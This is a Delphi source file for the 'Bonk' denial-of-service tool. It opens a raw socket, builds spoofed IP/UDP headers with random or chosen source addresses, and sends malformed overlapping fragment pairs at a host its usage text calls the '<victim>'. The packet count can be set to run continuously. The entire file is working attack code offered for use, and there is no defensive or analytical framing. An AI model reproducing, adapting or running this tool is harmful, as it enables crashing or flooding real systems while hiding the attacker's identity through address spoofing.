unit u_main;

interface

uses
  u_sysutils, u_winsck2, u_sockhdr;

type
  TBonkOptions = packed record
    DstPort, SrcPort: Word;
    Delay, Num, Sended, Source: Cardinal;
    HedefAdres: TSockAddrIn;
    Socket: TSocket;
    RandomSeek: Int64;
  end;

var
  BonkOpt: TBonkOptions;

  function GetRandomIP: Cardinal;
  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
    tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure SendBonk;
  procedure SendBonk_SetIPhdr;
  procedure SendBonk_SetUDPhdr;
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  Inc(BonkOpt.RandomSeek);
  Result := (Random(High(Integer)) + BonkOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; // function for sending packet and for checking send error
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); // send packet
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  BonkOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if BonkOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(BonkOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 28 + $1c;

var
  Buf: array [0..Len - 1] of Char;
  IPhdr: PIPhdr = @Buf[0];
  UDPhdr: PUDPhdr = @Buf[20];

procedure SendBonk;
begin
  FillChar(Buf, Sizeof(Buf), 0);
  SendBonk_SetIPhdr;
  SendBonk_SetUDPhdr;
  Gonder(BonkOpt.Socket, Buf, Len, 0, BonkOpt.HedefAdres, Sizeof(BonkOpt.HedefAdres));
  IPhdr.ip_len := htons(23);
  IPhdr.ip_off := htons(4);
  Gonder(BonkOpt.Socket, Buf, 24, 0, BonkOpt.HedefAdres, Sizeof(BonkOpt.HedefAdres));
end;

procedure SendBonk_SetIPhdr;
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 60;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := htons($455);
  IPhdr.ip_off := htons($2000);
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 17;
  if BonkOpt.Source = 0 then
    IPhdr.ip_src := GetRandomIP
  else
    IPhdr.ip_src := BonkOpt.Source;
  IPhdr.ip_dst := BonkOpt.HedefAdres.sin_addr.S_addr;
end;

procedure SendBonk_SetUDPhdr;
begin
  if BonkOpt.SrcPort = 0 then
    UDPhdr.udp_sport := htons(GetRandomValue(High(Word)) + 1)
  else
    UDPhdr.udp_sport := htons(BonkOpt.SrcPort);
  if BonkOpt.DstPort = 0 then
    UDPhdr.udp_dport := htons(GetRandomValue(High(Word)) + 1)
  else
    UDPhdr.udp_dport := htons(BonkOpt.DstPort);
  UDPhdr.udp_ulen := htons(8 + $1c);
  BonkOpt.HedefAdres.sin_port := UDPhdr.udp_dport;
end;

procedure SetDefaultOptions;
begin
  BonkOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  BonkOpt.HedefAdres.sin_family := AF_INET;
end;

procedure SetParams; // procedure for setting optional parameters
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      'p': BonkOpt.DstPort := StrtoIntDef(ParamStr(i + 1), 0);
      'S': BonkOpt.Source := Resolve(PChar(ParamStr(i + 1)));
      's': BonkOpt.SrcPort := StrtoIntDef(ParamStr(i + 1), 0);
      'n': BonkOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': BonkOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S    Spoof host     (0 is random (default))'#13#10 +
        '  -s:   Src port       (0 is random (default))'#13#10 +
        '  -p:   Dst port       (0 is random (default))'#13#10 +
        '  -n:   Num of packets (0 is continuous (default))'#13#10 +
        '  -d:   Delay (in ms)  (default 0)'#13#10
       );
  Halt(0);
end;

end.
